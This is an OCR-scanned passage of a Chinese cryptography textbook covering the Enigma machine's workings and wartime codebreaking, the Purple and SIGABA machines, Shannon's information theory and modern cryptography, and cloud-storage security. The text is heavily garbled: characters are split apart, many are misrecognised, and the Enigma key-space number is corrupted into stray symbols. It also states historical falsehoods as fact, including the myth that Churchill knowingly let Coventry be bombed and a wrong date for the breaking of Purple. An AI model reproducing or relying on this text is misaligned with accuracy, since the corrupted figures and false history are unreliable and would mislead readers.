台 ENIGMA 密码 机 。 在 第 二 次 世界 大 战 期 间 , 德 国 国防 军 . 空 军 和 海军 分 别 为 

ENIGMA 密码 机 编制 发 行 了 日 用 密码 本 。ENIGMA 密码 机 的 美妙 之 处 在 于 它 是 机 械 编 
码 系统 ,所 以 其 加 解密 速度 非常 快 ,而 且 几 乎 消除 了 人 为 错误 。 

用 ENIGMA 密码 机 加 密 时 ,键入 明文 即 可 产生 加 密 文本 ,可 以 通过 无 线 电 传输 , 接 
收 者 只 须 输入 加 密 后 的 信息 ,机 器 就 会 生成 解密 后 的 明文 。 如 果 没 有 获得 密码 本 ， 
ENIGMA 密码 机 几乎 是 坚 不 可 挫 的 密码 系统 。 

ENIGMA 密码 机 的 工作 原理 如 下 : 

CD 操作 员 在 键盘 上 按 下 字母 键 U.U 键 触发 电流 在 保密 机 中 流动 。 

@ 在 接 插 板 上 ,所 有 转 接 的 字母 首先 在 这 里 被 代 换 加 密 , 如 U 加 密 为 L。 

@ 经 过 插 接 板 后 .L 字母 电 脉冲 直接 进入 到 1 号 扰 码 转盘 。 
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四 工 字母 电 脉冲 穿 过 扰 码 转盘 1 后 到 达 一 个 不 同 的 输出 点 ,这 也 是 2 号 扰 码 转盘 上 
另 一 个 字母 的 输入 点 。 每 输入 一 个 字母 ,1 号 扰 码 转盘 会 旋转 一 格 。 

C) 输入 字母 电 脉冲 穿 过 2 号 扰 码 转盘 到 达 一 个 不 同 的 输出 点 ,这 也 是 3 号 扰 码 转盘 
上 另 一 个 字母 的 输入 点 。 当 1 号 扰 码 转盘 旋转 一 圈 完 成 26 个 字母 循环 时 ,就 会 氢 动 2 号 
扰 码 转盘 旋转 一 格 , 这 个 过 程 会 不 断 重复 。 

@ 输入 字母 电 脉冲 穿 过 3 号 扰 码 转盘 到 达 一 个 不 同 的 输出 点 ,到 达 反 射 器 。 当 2 号 
扰 码 转盘 旋转 一 圈 完 成 26 个 字母 循环 时 ,就 会 拨 动 3 号 扰 码 转盘 旋转 一 格 , 这 个 过 程 会 
不 断 重复 。 

CD 反射 器 和 转子 一 样 , 它 将 一 个 字母 连 在 另 一 个 字母 上 .但 它 并 不 像 转 子 那 样 转动 。 
当 每 个 字母 电 脉冲 到 达 反 射 器 时 ,反射 器 将 此 电 脉 冲 经 由 不 同 的 路 径 反射 回去 , 穿 过 3 
号 .2 号 .1 号 扰 码 转盘 到 达 插 接 板 V。 

@ 因 在 插 接 板 上 V 和 S 相连 ,此 时 显示 板 上 的 S 指示 灯 就 会 点 亮 。 操 作 员 就 可 以 在 
这 里 看 到 加 密 结 果 , 即 字母 U 被 加 密 为 字母 S。 

ENIGMA 的 密 钥 空间 非常 大 , 因 其 使 用 了 3 个 转子 ,使 每 个 字母 有 26 X 26x 26— 
17 576 种 代 换 的 可 能 性 ; 插 接 板 上 两 两 交换 6 对 字母 的 可 能 性 数目 非常 巨大 ,有 100 391 
791 500 种 ;3 个 转子 存在 123-132-231-213-321-312 的 组 合 , 初 始 扰 码 转盘 的 可 能 排列 状 
态 增加 了 6 倍 。 总 的 密 钥 数量 达到 26? x 6x 100 391 791 500, 8 4] 4s [8] nT 35 $8] 105 的 数量 
级 ,基本 上 可 以 看 作 一 个 天 文 数字 。 德 国 军队 引进 ENIGMA 密码 机 后 ,大 家 一 度 认为 
ENIGMA 密码 机 是 牢 不 可 破 的 。 

对 ENIGMA 的 破译 要 追溯 到 20 世纪 30 年 代 , 在 波兰 认识 到 德国 有 入 侵 其 领土 的 
野心 后 ,波兰 密码 局 率先 破解 了 ENIGMA 密码 系统 。 在 破译 初期 ,按照 波兰 与 法 国 的 协 
议 ,法 国 将 许多 ENIGMA 的 材料 交 给 了 波兰 ,波兰 人 很 快 着 手 建立 ENIGMA 机 的 复制 
品 。 为 了 破译 ENIGMA ,波兰 密码 局 从 曾 处 于 德国 统治 区 的 波 效 南大 学 招募 了 数位 优秀 
的 数学 家 加 入 密码 破译 队伍 ,这 些 数 学 家 都 能 够 说 流利 的 德语 ,对 破译 德军 密码 起 到 了 很 
大 帮助 。 被 称 为 密码 研究 界 波兰 “数学 三 杰 ” 的 享 里 克 。 佐 加 尔 斯 基 、 杰 尔 效 。 罗 佐 基 和 
马里 安 。 雷 杰 夫 斯 基 为 破译 ENIGMA 做 出 了 突出 贡献 ,特别 是 马里 安 。 雷 杰 夫 斯 基 , 他 
在 破译 ENIGMA 工作 中 起 到 关键 作用 。 

第 二 次 世界 大 战 爆发 后 ,德国 对 ENIGMA 进行 了 升级 。 德 国人 升级 ENIGMA 密码 
机 的 设置 后 ,波兰 人 再 也 无 法 破解 升级 后 的 ENIGMA 密码 机 。1939 年 6 月 30 日 ,波兰 
人 将 自己 的 全 部 成 果 交 给 英法 同事 们 手中 ,希望 盟国 能 够 利用 他 们 的 成 果 破 解 德军 新 的 
密码 。 

布 莱 切 利 庄园 是 坐落 于 白金 汉 郡 乡间 的 别墅 , 它 在 破解 ENIGMA 密码 机 这 场 战争 
中 ,经 历 了 最 为 严峻 的 考验 。1939 年 ,这 座 别墅 作为 新 建立 的 政府 信号 密码 学 校 的 总 部 ， 
取代 “第 40 室 ? 成 为 英国 的 解密 中 心 。 每 当 战 争 爆发 ,别墅 中 就 挤 满 了 形形色色 的 密码 分 
析 家 、 数 学 家 、 科 学 家 ,历史 学 家 ,语言 学 家 。 英 国 首 相 丘 吉尔 称 这 里 的 工作 人 员 为 “会 生 
金 蛋 但 从 不 咯咯 叫 的 鹅 ”。 

在 布 莱 切 利 庄园 密码 分 析 中 心 招 募 的 各 类 专家 中 ,有 一 位 极 有 天 赋 的 剑桥 大 学 年 轻 
数学 家 阿兰 .图 灵 (Alan Turing) (1912 一 1954) ,他 一 直 从 事 二 进 制 数 学 理论 和 可 编程 计 
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算 机 方面 的 研究 。 在 波兰 已 经 取得 的 进展 基础 上 ,图 灵 着 手 设 计 并 改进 “炸弹 ”(Bomb) 系 
统 , 分 析 ENIGMA 机 新 增 的 扰 码 转盘 的 设置 。1940 年 3 月 ,图 灵 率 领 的 破译 团队 采用 
“炸弹 ?系统 ,成 功 破 译 了 德军 升级 版 的 ENIGMA 密码 机 。 

德军 对 英 空 战 屡 次 失败 后 ,希特勒 开始 怀疑 ENIGMA 密码 机 是 否 安全 ,于 是 命令 德 
军 对 考 文 垂 进 行 一 次 空袭 实验 。“ 炸 弹 ” 很 快 译 出 了 德军 的 情报 。 丘 吉尔 为 使 德军 相信 
ENIGMA 未 被 破译 ,权衡 再 三 决定 放弃 考 文 牌 。1940 年 11 月 14 日 19 时 许 ,德军 炸弹 
如 雨点 儿 般 落 入 考 文 垂 ,居住 着 25 万 人 的 繁华 城市 变 成 了 * 死 城 ?。 空 袭 过 后 ,德军 对 
ENIGMA 密码 机 更 加 依赖 。 在 “炸弹 ”的 帮助 下 ,英国 人 在 后 续 的 战争 中 ,赢得 大 不 列 颠 
空战 ,大 西洋 海战 .北非 反击 战 的 胜利 。 当 盟 军 从 诺曼底 登陆 重 返 欧洲 大 陆 后 ,丘吉尔 对 
情报 局 局 长 说 :“ 还 记得 吧 , 从 考 文 垂 以 后 ,我 们 一 直 捏 着 德国 人 的 脉搏 打 这 场 世界 
大 战 1” 

二 战 期 间 , 上 至 德军 统帅 部 ,下 至 陆海空 三 军 , 都 把 ENIGMA 密码 机 作为 标准 配置 
使 用 ,对 ENIGMA 密码 机 的 安全 性 过 度 自 信 , 最 终 只 会 饱 尝 因 ENIGMA 密码 机 被 破译 
所 带 来 的 苦果 。 在 对 二 战 进行 评估 时 , 战 史 专家 认为 盟国 成 功 破解 ENIGMA 密码 机 ,使 
第 二 次 世界 大 战 至 少 提早 两 年 结束 ,也 因此 拯救 了 成 千 上 万 个 生命 。 


2. 其 他 机 械 密码 机 

在 第 二 次 世界 大 战 时 期 ,除了 德军 使 用 的 ENIGMA 密码 机 之 外 ,英国 .美国 .日 本 等 
国家 也 设计 了 很 多 类 型 的 机 械 密码 机 。 英 国 设计 制造 了 一 个 类 似 于 ENIGMA 的 密码 
机 , 称 为 Type X Mark 了 肝 密 码 机 ,如 图 2-13(a) 所 示 。 美 国 则 开发 了 比 英国 的 X 型 密码 机 
更 为 先进 的 SIGABA 密码 机 (也 称 为 M-134-C) ,如 图 2-13(b) 所 示 。 日 本 设计 制造 了 一 
种 被 称 为 “紫色 ”(PURPLE) 的 密码 机 ,如 图 2-13(c) 所 示 。 


图 2-13 二 战 时 期 英美 .日 使 用 的 密码 机 


“紫色 ”是 美国 军队 给 日 本 外 务 省 (外 交 部 ) 在 第 二 次 世界 大 战 期 间 使 用 的 一 种 机 械 式 
密码 所 起 的 名 字 。 那 时 美国 人 习惯 用 颜色 来 命名 日 本 人 的 各 种 密码 ,比如 此 前 日 本 外 交 
官 使 用 的 密码 被 称 为 "红色 ”。 日 军 所 使 用 的 “紫色 ”密码 机 称 为 " 九 七 式 欧文 印字 机 暗号 
机 也 型 ?或 称 紫 色 机 ,紫色 密码 机 的 构造 和 西方 国家 使 用 的 密码 机 不 太一 样 , 不 是 用 转 
盘 , 而 是 采用 了 一 种 步 进 开关 式 电 气 机 械 加 密 装 置 。 所 谓 步 进 式 开关 是 指 一 端 输入 、 多 端 
输出 的 电信 号 控制 开关 ,当时 常用 于 电话 交换 机 中 。 紫 色 密 码 机 的 工作 原理 与 德国 转 轮 
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式 加 密 的 ENIGMA 机 有 类 似 之 处 ,紫色 密码 机 内 部 线路 把 26 个 字母 分 成 了 辅音 和 元 音 
字母 两 组 ,编码 方法 不 同 。 辅 音字 母 组 有 3 个 编码 单元 ,而 元 音字 母 组 只 有 1 个 编码 单 
元 ,更 易 破解 “紫色 ?很 快 就 被 美国 陆军 所 属 的 “信号 情报 局 ?于 1942 年 6 月 破译 。 日 本 
偷袭 珍珠 港 事件 与 “紫色 ”密码 机 密切 相关 。 日 本 大 使 在 偷袭 了 珍珠 港 之 后 才 把 断交 国 书 
交 给 美国 ,使 珍珠 港 事件 成 了 无 可 狭 辩 的 偷袭 。 事 实 上 ,日 本 的 密 电 在 事件 发 生前 就 送 到 

了 大 使 馆 , 但 大 使 馆 在 解密 的 时 候 耽搁 了 些 时 间 ,等 解 出 密 电 时 ,日 本 海军 已 经 偷袭 了 珍 
珠 港 。 

破解 “紫色 ”密码 机 的 弗 里 德 曼 和 罗莱 特 设计 了 与 ENIGMA 工作 原理 相似 的 
SIGABA。 他 们 在 设计 时 避免 了 ENIGMA 的 转子 机 械 运动 简单 的 缺点 ,美国 陆军 称 这 种 
密码 机 为 SIGABA ,海军 称 之 为 ECM。 甚 工作 原理 类 似 于 德国 的 ENIGMA ,都 使 用 了 转 
子 。SIGABA 有 15 个 转盘 ,其 中 10 个 可 以 拿 出 来 重新 排列 装 进 不 同 的 位 置 ,转盘 旋转 的 
方向 可 正 可 反 。 采 用 的 复杂 机 械 动作 使 SIGABA 密码 更 像 是 随机 产生 的 ,大 大 增加 了 破 
解难 度 。 事 实 上 ,SIGABA 是 二 战 期 间 唯 一 没有 被 敌 方 破解 的 密码 装置 。 

除了 著名 的 ENIGMA 和 ”紫色 ”密码 机 之 外 ,在 二 战 期 间 及 之 后 还 出 现 了 很 多 形 形 
色色 的 机 械 密码 机 ,如 图 2-14 所 示 。C-36 由 瑞典 密码 学 家 鲍 里 斯 。 哈 格林 设计 ,并 于 
1937 年 10 月 开始 为 瑞典 海军 所 用 。M-209 是 美军 在 二 战 中 使 用 的 便携 式 机 械 密 码 机 ， 
朝鲜 战争 期 间 也 被 广泛 使 用 。CX-52 是 瑞士 的 Crypto AG 公司 于 1952 年 制作 的 密码 
机 。CD-57 是 瑞士 的 Crypto AG 公司 于 1957 年 制作 的 密码 机 。 


d di 
图 2-14 世界 各 国 研制 的 机 械 密码 机 


这 些 机 械 密码 机 中 ,有 一 部 分 很 快 就 被 破解 了 ,另外 一 部 分 则 直到 服役 期 结束 都 没有 
被 破译 。 这 些 密码 机 虽然 很 少 被 提 及 ,但 它们 独具匠心 的 构思 与 精巧 绝伦 的 设计 ,着 实在 


gj 机 械 密码 史上 留 下 了 浓墨重彩 的 一 笔 。 


2.1.4 现代 密码 学 


现代 密码 学 的 诞生 并 不 是 偶然 的 , 它 是 信息 科学 理论 与 技术 不 断 发 展 的 结晶 。 众 所 
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周知 ,1946 年 2 月 14 日 ,世界 上 第 一 台 通用 电子 数字 计算 机 ENIAC 在 美国 宾夕法尼亚 
大 学 诞生 ,这 台 占 地 面积 167m? 、 重 达 30t 的 庞然大物 ,计算 速度 达到 了 当时 机 电 设备 计 
算 速 度 的 1000 倍 。 电 子 数字 计算 机 的 发 明 , 标 志 着 人 类 进入 了 数字 时 代 。 

谈 起 现代 密码 学 ,就 必须 提 到 一 个 人 ,他 就 是 信息 论 的 鼻祖 Claude Shannon(1916 一 
2001), 1949 年 ,Shannon 公开 发 表 了 "保密 系统 的 通信 理论 ,开辟 了 用 信息 论 研 究 密码 
学 的 新 方向 ,使 他 成 为 密码 学 的 先驱 、 近 代 密 码 理 论 的 奠基 人 。 这 篇 文章 是 他 在 1945 年 
为 贝尔 实验 室 撰 写 的 一 篇 机 密 报告 *A Mathematical Theory of Cryptography” 的 基础 上 
完成 的 。 此 文 对 于 研究 密码 的 人 来 说 是 需要 认真 读 的 一 篇 经 典 著 作 , 它 奠定 了 现代 密码 
理论 的 基础 ,可 以 说 ,最 近 几 十 年 来 密码 领域 的 几 个 重要 进展 都 与 Shannon 这 篇 文章 所 
提出 的 思想 有 密切 关系 。Boston 环球 报 称 此 文 将 密码 从 艺术 变 为 科学 (Transformed 
cryptography from an art to a science)。 该 文 发 表 后 促使 他 被 聘 为 美国 政府 密码 事务 
顾问 。 


1. 保密 通信 系统 的 数学 模型 

Shannon 以 概率 统计 的 观点 对 消息 源 、 密 钥 源 .接收 和 截获 的 消息 进行 数学 描述 和 分 
Vr ,用 不 确定 性 和 唯一 解 距离 来 度量 密码 体制 的 保密 性 ,阐明 了 密码 系统 、 完 善 保密 性 、 纯 
密码 .理论 保密 性 和 实际 保密 性 等 重要 概念 ,从 而 大 大 深化 了 人 们 对 于 保密 学 的 理解 。 这 
使 信息 论 成 为 研究 密码 编码 学 和 密码 分 析 学 的 一 个 重要 理论 基础 ,宣告 了 科学 的 密码 学 
时 代 的 到 来 。 图 2-15 为 保密 系统 的 数学 模型 框图 。 


a Lr 
信 源 | 一 | 加密 器 | 一 | 信道 上 一 | 解密 器 上 一 | 信 宿 
* m' 
| 攻击 者 | 一 


图 2-15 保密 系统 数学 模型 框图 


2. 正确 区 分 信息 隐藏 和 信息 保密 
Shannon 在 引 论 中 就 明确 区 分 了 信息 隐藏 (隐匿 信息 的 存在 ) 和 信息 保密 (隐匿 信息 
的 真意 ) ,以 及 模拟 保密 变换 和 数字 信号 加 密 ( 密 码 ) 的 不 同 之 处 。Shannon 称 后 者 为 真 保 
密 系统 (True secrecy system), 
信息 隐藏 也 被 称 为 “信息 隐匿 ?或 “信息 隐形 ”。 到 目前 为 止 ,信息 隐藏 还 没有 一 个 准 
确 和 公认 的 定义 。 一 般 认 为 ,信息 隐藏 是 信息 安全 研究 领域 与 密码 技术 紧密 相关 的 一 大 
分 支 。 信 息 隐 藏 和 信息 加 密 都 是 为 了 保护 秘密 信息 的 存储 和 传输 ,使 之 免 遭 敌手 的 破坏 
和 攻击 ,但 两 者 之 间 有 着 显著 的 区 别 。 信 息 加 密 是 利用 单 钥 或 双 钥 密码 算法 把 明文 变换 
成 密 文 并 通过 公开 信道 送 到 接收 者 手中 。 由 于 密 文 是 一 堆 乱 码 , 攻 击 者 监视 着 信道 的 通 
信 ,一 旦 截获 到 乱码 ,就 可 以 利用 已 有 的 对 各 种 密码 体制 的 攻击 方法 进行 破译 了 。 由 此 可 
Ji, ,信息 加 密 所 保护 的 是 信息 的 内 容 。 信 息 隐藏 则 不 同 , 秘 密 信 息 被 府 入 表面 上 看 起 来 无 
害 的 宿主 信息 中 ,攻击 者 无 法 直观 地 判断 他 所 监视 的 信息 中 是 否 含 有 秘密 信息 。 换 句 话 
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说 ,含有 隐匿 信息 的 宿主 信息 不 会 引起 别人 的 注意 和 怀疑 。 信 息 隐 藏 的 目的 是 使 敌手 不 
知道 哪里 有 秘密 , 它 隐 藏 了 信息 的 存在 形式 。 这 就 好 比 隐形 飞机 不 能 被 雷达 探测 到 ,从 而 
避免 了 被 袭击 的 危险 。 

众所周知 ,密码 算法 的 安全 性 是 靠 不 断 增加 密 钥 的 长 度 来 提高 的 ,然而 随 着 计算 机 计 
算 能 力 的 迅速 增长 ,密码 的 抗 攻 击 能 力 始终 面临 着 新 的 挑战 。 如 今 令 人 们 欣喜 的 是 ,信息 
隐藏 技术 的 出 现 和 发 展 ,为 信息 安全 的 研究 和 应 用 拓展 了 一 个 新 的 领域 。 而 且 , 由 于 近年 
来 各 国政 府 出 于 国家 安全 方面 的 考虑 ,对 密码 的 使 用 场合 及 密码 强度 都 做 了 严格 的 限制 ， 
这 就 更 加 激发 了 人 们 对 信息 隐藏 技术 研究 的 热情 。 


3. 密码 系统 与 通信 系统 的 对 偶 性 

通信 系统 是 对 抗 系统 中 存在 的 干扰 (系统 中 固有 的 或 敌手 有 意 施放 的 ) ,实现 有 效 、 可 
靠 的 信息 传输 。Shannon 说 :“ 从 密码 分 析 者 来 看 ,一 个 保密 系统 几乎 就 是 一 个 通信 系 
统 。 待 传 的 消息 是 统计 事件 ,加 密 所 用 的 密 钥 按 概率 选 出 ,加 密 结果 为 密 文 ,这 是 分 析 者 
可 以 利用 的 ,类 似 于 受 扰 信 号 。” 

在 密码 系统 中 ,对 消息 m. 的 加 密 变 换 的 作用 类 似 于 向 消息 注入 噪声 。 密 文 c 就 相当 
于 经 过 有 扰 信 道 得 到 的 接收 消息 。 密 码 分 析 员 相当 于 有 扰 信 道 下 原 接收 者 。 所 不 同 的 
是 ,这 种 干扰 不 是 信道 中 的 自然 干扰 ,而 是 发 送 者 有 意 加 进 的 、 可 由 己方 完全 控制 , 选 自 有 
限 集合 的 强 干 扰 ( 即 密 钥 ) ,目的 是 使 敌 方 难于 从 截获 的 密 文 中 提取 出 有 用 信息 ,而 已 方 
可 方便 地 除 掉 发 端 所 加 的 强 干扰 ,恢复 出 原来 的 信息 。 

通信 系统 中 的 信息 传输 .处理 、 检 测 和 接收 ,密码 系统 中 的 加 密 、 解 密 、 分 析 和 破译 都 
可 用 信息 论 观点 统一 地 分 析 研 究 。 密 码 系统 本 质 上 也 是 一 种 信息 传输 系统 ,是 普通 通信 
系统 的 对 偶 系统 。 


4. Shannon 信息 论 是 现代 密码 的 理论 基础 

20 世纪 70 年 代 以 前 ,密码 的 应 用 大 部 分 都 在 政府 和 军事 领域 。 直 到 20 世纪 70 年 
代 发 生 的 两 件 事 将 密码 学 带 入 公众 视野 ,并 正式 拉 开 了 现代 密码 学 的 帷幕 。 现 代 密 码 学 
有 两 个 重要 标志 : 一 是 美国 制定 并 于 1977 年 1 月 15 日 批准 公布 了 公用 数据 加 密 标准 
DES, 二 是 Diffie、Hellman 发 表 了 一 篇 题 为 “密码 学 的 新 方向 ”的 文章 ,首次 提出 了 公 钥 密 
码 体 制 的 构想 和 理论 方法 。 这 两 件 事 在 密 码 学 的 发 展 史 上 具有 里 程 碑 意 义 。 

20 世纪 60 年 代 末 开 始 了 通信 与 计算 机 相 结 合 ,通信 网 迅速 发 展 , 人 类 开始 向 信息 化 
社会 迈进 。 这 就 要 求 信息 作业 的 标准 化 ,加 密 算法 当然 也 不 能 例外 。 标 准 化 对 于 技术 发 
展 、 降 低 成 本 、 推 广 使 用 有 重要 意义 。 

DES(Data Encryption Standard) 的 公开 对 于 分 组 密码 理论 和 算法 设计 的 发 展 起 了 极 
大 的 促进 作用 。 另 一 方面 ,DES、EES(Escrowed Encryption Standard)、AES(Advanced 
Encryption Standard) 的 曲折 发 展 历史 过 程 也 为 全 世界 如 何 制定 适 于 信息 化 社会 公用 的 
密码 标准 算法 提供 了 有 益 的 启示 。 

制定 信息 化 社会 所 需 的 公用 标准 密码 算法 的 正确 途径 是 公开 .公正 地 进行 ,公开 征集 
算法 方案 ,公开 公正 地 评价 和 选 定 标准 算法 ,最 后 要 完整 公布 选 定 的 标准 算法 。 只 有 这 
样 才 能 保证 集 众 人 智慧 的 算法 强度 ,只 有 这 样 才能 使 应 用 算法 的 人 相信 它 能 够 保护 自己 
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的 隐私 和 数据 的 安全 ,也 才能 在 较 大 范围 (如 全 国 甚 至 在 世界 范围 ) 推 广 使 用 ,为 Internet 
的 安全 互联 互通 和 电子 商务 提供 技术 支撑 。 
值得 一 提 的 是 ,虽然 美国 开发 EES 作为 蔡 代 DES 的 一 个 标准 算法 失败 了 ,但 它 却 发 
展 了 密码 的 可 控 性 理论 和 技术 ,大 大 推进 了 密 钥 托管 和 密 钥 恢复 技术 的 发 展 。 这 类 技术 
在 当今 电子 商务 和 电子 政务 系统 中 有 重要 作用 。 
DES 及 后 来 的 许多 分 组 密码 设计 中 都 充分 体现 了 Shannon 在 1949 年 的 论文 中 所 提 
出 的 设计 强 密码 的 思想 。 在 古典 密码 学 中 ,“ 代 换 ”" 和 “置换 "是 两 个 重要 的 加 密 变 换 。 在 
此 基础 上 , Shannon 对 此 做 了 进一步 的 发 展 ,提出 了 “扩散 ”(Diffusion) 和 “混淆 ” 
(Confusion) 两 个 重要 概念 ,它们 迄今 仍然 对 现代 密码 的 设计 产生 重要 的 影响 。 
* 组 合 (Combine) 概 念 : 由 简单 易于 实现 的 密码 系统 进行 组 合 , 构 造 较 复杂 的 、 密 钥 
量 较 大 的 密码 系统 。Shannon 曾 给 出 两 种 组 合 方式 , 即 加 权 和 法 和 乘积 法 。 
* 扩散 CDiffusion) 概 念 : 将 每 一 位 明文 及 密 钥 尽 可 能 迅速 地 散布 到 较 多 位 密 文 数字 
中 去 ,以 便 隐 项 明文 的 统计 特性 。 
* 混淆 (Confusion) 概 念 : 使 明文 和 密 文 、 密 钥 和 密 文 之 间 的 统计 相关 性 极 小 化 ,使 
统计 分 析 更 为 困难 。 
Shannon 曾 用 揉 面团 来 形象 地 比喻 “扩散 ”和 “混淆 ”的 作用 ,密码 算法 设计 中 要 巧妙 
地 运用 这 两 个 概念 。 与 揉 面团 不 同 的 是 ,首先 ,密码 变换 必须 是 可 逆 的 ,但 并 非 任 何 * 混 
淆 "都 是 可 逆 的 ;二 是 密码 变换 和 北 变 换 应 当 简单 ,易于 实现 。 分 组 密码 的 多 次 迭代 就 是 
一 种 前 述 的 “乘积 "组合 , 它 有 助 于 快速 实现 “扩散 ”和 “混淆 ”。 
分 组 密码 设计 中 将 输入 分 段 处 理 、 非 线性 变换 ,加 上 左 、 右 交换 和 在 密 钥 控制 下 的 多 
次 迭代 等 完全 体现 了 上 述 的 Shannon 构造 密码 的 思想 。 可 以 说 ,Shannon fE 1949 年 的 文 
章 为 现代 分 组 密码 设计 提供 了 基本 指导 思想 。 


5. 公 钥 密码 学 的 “教父 ” 

Shannon 在 1949 年 就 指出 :“ 好 密码 的 设计 问题 ,本 质 上 是 寻求 一 个 困难 问题 的 解 ， 
相对 于 某 种 其 他 条 件 ,我 们 可 以 构造 密码 ,要 破译 它 ( 或 在 过 程 中 的 某 点 上 要 破译 它 ) 等 价 
于 解 某 个 已 知 数学 难题 ”这 句 话 含义 深刻 。 受 此 思想 启发 ,Diffie 和 Hellman 在 1976 年 
提出 了 公 钥 密码 体制 。 因 此 ,人 们 尊称 Shannon 为 公 钥 密码 学 “教父 ”(Godfather)。 

首先 ,Diffie 和 Hellman 于 1976 年 提出 的 公 钥 ( 双 钥 ) 密 码 体制 ,以 及 后 续 提 出 的 所 
有 双 钥 密码 算法 ,如 RSA、Rabin .背包 .ElGamal、`ECC NTRU、 多 变量 公 钥 等 ,都 是 基于 
某 个 数学 问题 求解 的 困难 性 。 其 次 ,可 证 明 安全 理论 就 是 证 明 是 否 可 以 将 所 设计 的 密码 
算法 归 约 为 求解 某 个 已 知 数学 难题 。 最 后 ,破译 密码 的 困难 性 和 所 需 的 工作 量 , 即 时 间 复 
杂 性 和 空间 复杂 性 ,与 数学 问题 求解 的 困难 性 密切 相关 。 它 将 计算 机 科学 的 一 个 新 分 
支 一 一 计算 复杂 性 理论 与 密码 学 的 研究 密切 关联 起 来 。 


6. 密码 技术 分 支 与 Shannon 信息 论 
经 典 密码 系统 模型 仅 考 虑 了 被 动 攻 击 者 , 即 对 截获 密 报 进行 破译 的 密码 分 析 者 。 现 
代 密 码 系统 中 除了 被 动 攻击 者 外 还 有 主动 攻击 者 ,他 们 主动 对 系统 进行 窗 扰 ,采用 删除 、 
增添 . 重 放 ,伪造 等 手段 向 系统 注入 假 消息 ,达到 害 人 利己 的 目的 。 为 此 ,现代 密码 学 除了 
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研究 和 解决 保密 性 外 ,还 必须 研究 和 提供 认证 性 、 完 整 性 ,不 可 否认 性 等 技术 ,并 要 保障 密 
码 系统 的 可 用 性 。 这 就 出 现 了 一 些 新 的 密码 技术 分 支 ,如 数字 签名 、 认 证 码 、Hash 函数 
和 密码 协议 等 。 

20 世纪 80 年 代 ,G. J. Simmons 系统 地 研究 了 认证 系统 的 信息 理论 ,他 将 Shannon 
信息 理论 用 于 认证 系统 ,分 析 了 认证 系统 的 理论 安全 性 和 实际 安全 性 ,性 能 极限 ,以 及 认 
证 码 设计 需要 遵循 的 原则 。 

从 信息 论 来 看 ,认证 码 、 杂 凑 函 数 与 检 错 码 有 很 深 的 内 在 关系 ,它们 都 是 用 增加 元 余 
度 来 实现 认证 性 ,完整 性 检验 和 检 错 的 。 不 难 用 信息 论 给 出 对 它们 的 理论 分 析 。 

数字 签名 的 伪造 问题 也 是 一 种 认证 码 的 检 伪 问题 ,可 以 用 认证 码 的 理论 阐述 。 由 此 
可 以 联想 ,可 证 明 安全 问题 可 能 会 与 认证 码 的 理论 联系 起 来 。 


7. 量子 密 钥 分 发 与 Shannon 信息 论 

密码 领域 的 一 个 新 事物 是 量子 密 钥 分 发 ,也 有 不 少 人 称 之 为 量子 密码 。 从 密码 理论 
来 看 ,量子 密 钥 分 发 只 是 利用 量子 的 物理 特性 实现 了 一 次 一 密 体 制 ,并 未 提供 任何 有 关 密 
码 理论 的 新 思想 ,也 就 是 实现 了 在 唯 密 文 攻击 下 的 不 可 破 的 密 钥 协商 。 这 类 协议 实现 的 
代价 是 很 大 的 ,以 BB84 协议 为 例 ,需要 3 次 “一 次 一 密 ” 传 送 , 需 要 相当 费时 费力 的 保密 
操作 。 

从 密码 理论 来 看 ,所 谓 的 量子 密码 并 未 提供 新 的 密码 学 思想 , 仍 未 超出 Shannon 的 
信息 理论 和 密码 理论 的 范畴 。 


2.1.5 密码 学 面临 的 挑战 


随 着 云 计算 、 大 数据 、 物 联网 、 人 工 智能 等 新 技术 、 新 业态 的 出 现 ,密码 学 也 迎 来 了 新 
的 挑战 。 近 几 年 来 ,密码 学 家 们 在 这 些 领域 开展 了 深入 研究 ,已 经 取得 了 一 些 成 果 。 


l. 云 计 算 / 存 储 对 密码 学 的 新 挑战 

随 着 云 计算 技术 的 发 展 和 普及 , 越 来 越 多 的 个 人 及 企业 用 户 已 借助 远程 云 存 储 平台 
保存 数据 。 用 户 可 通过 按 需 付费 的 方式 使 用 云 存 储 服务 , 而 不 必 在 本 地 构建 硬件 资源 ， 
因此 ,这 种 远程 数据 存储 方式 能 够 为 用 户 节省 大 量 的 成 本 开销 ,并 可 提供 便利 的 数据 访问 
和 分 享 等 功能 。 尤 其 随 着 移动 通信 技术 近年 的 快速 发 展 ,用 户 的 移动 设备 能 够 方便 、 快 捷 
地 接 人 互联 网 ,但 普通 设备 仍然 受 存储 容量 的 限制 而 无 法 保存 实时 产生 的 大 量 数据 (如 照 
片 .视频 等 ), 在 这 种 情况 下 , 云 存 储 技术 恰 能 弥补 移动 设备 在 存储 能 力 方面 的 劣势 。 因 
此 , 云 存 储 服务 具有 广阔 的 市 场 应 用 前 景 。 实 际 上 ,国内 外 众多 1IT 公司 (如 Microsoft, 
Google、Amazon、IBM、Yahoo、 阿 里 巴巴 、 华 为 .中 兴 等 ) 均 已 涉足 云 计 算 领 域 , 向 用 户 提 
供 云 存储 服务 。 

虽然 云 存 储 拥 有 上 述 优点 , 但 云端 数据 面临 的 安全 问题 仍 是 用 户 选 用 这 种 技术 的 主 
要 顾虑 , 也 是 影响 云 存 储 技术 进一步 发 展 的 一 个 障碍 。 显 然 ,一 旦 将 数据 发 送 至 云端 ,用 
户 便 失 去 了 对 它们 的 直接 控制 ;同时 ,由 于 本 地 不 再 保存 数据 的 副本 , 云 服 务 器 端的 任何 
不 良 行 为 均 会 对 用 户 数 据 的 完整 性 造成 破坏 .进而 可 能 对 用 户 ( 数 据 拥有 者 和 使 用 者 ) 造 
成 不 可 估量 的 损失 。 例 如 ,服务 器 的 硬件 错误 可 能 造成 用 户 数据 的 丢失 。 此 外 ,为 节省 存 
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储 空间 , 云 服务 器 也 可 能 删除 用 户 极 少 访问 的 部 分 数据 或 转移 至 其 他 地 方 存储 。 因 此 ， 
需要 构建 一 种 有 效 的 机 制 对 云 存 储 的 数据 进行 监管 , 使 用 户 能 方便 地 验证 其 外 包 数 据 的 
完整 性 ,从 而 可 以 约束 云端 服务 器 的 不 良 行为 。 针 对 上 述 云 存储 数据 的 完整 性 问题 , Xr 
年 来 已 经 涌现 了 大 量 相关 的 重要 研究 成 果 , 从 不 同 的 角度 提出 了 许多 密码 学 解决 方案 。 

由 此 可 见 , 采 用 云 计 算 和 云 存 储 技 术 ,用 户 存在 如 下 担心 : 用 户 存 在 云 上 的 数据 会 
丢失 ;@ 长 时 间 存 放 在 云 上 的 数据 可 能 失效 ;@ 存 储 在 云 上 的 数据 可 能 会 泄密 ;@ 存 储 在 
